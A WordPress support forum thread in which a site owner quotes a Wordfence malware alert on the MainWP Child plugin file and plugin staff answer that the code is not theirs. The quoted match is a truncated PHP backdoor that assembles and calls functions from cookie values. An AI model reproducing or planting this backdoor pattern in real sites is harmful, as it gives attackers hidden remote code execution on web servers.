Wordfence malware alert Backdoor:PHP/reval.C.3102

  • Resolved Roberto Jobet

    (@robertojobet)


    4 years ago

    Hi,

    I received a Wordfence malware alert in one of my websites, regarding a Backdoor:PHP/reval.C.3102 script in wp-content/plugins/mainwp-child/mainwp-child.php file

    Details:
    The matched text in this file is:

    $p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(

    Is this real malware or a false positive?

    Regards,
    Roberto Jobet

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Support Bogdan Rapaic

    (@bogdanrapaic)

    Hi @robertojobet,

    Thanks for reaching out.

    This code is not part of the MainWP Child plugin code here on www.remarpro.com or our official Github repo. We use Hackerone and our white hat reward program to have our plugins consistently tested for vulnerabilities, so I don’t believe this type of intrusion would come from your MainWP Child. The code may be placed there by another insecure plugin. We are also not seeing any other reports here or in our community. If you have additional questions, please open a ticket, and we’ll be happy to take a look.

    Thanks,
    Bogdan R.

    Plugin Author mainwp

    (@mainwp)

    Hi Roberto,

    I will go ahead and resolve this ticket. If any further help is needed, feel free to open a helpdesk ticket.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Wordfence malware alert Backdoor:PHP/reval.C.3102’ is closed to new replies.

Tags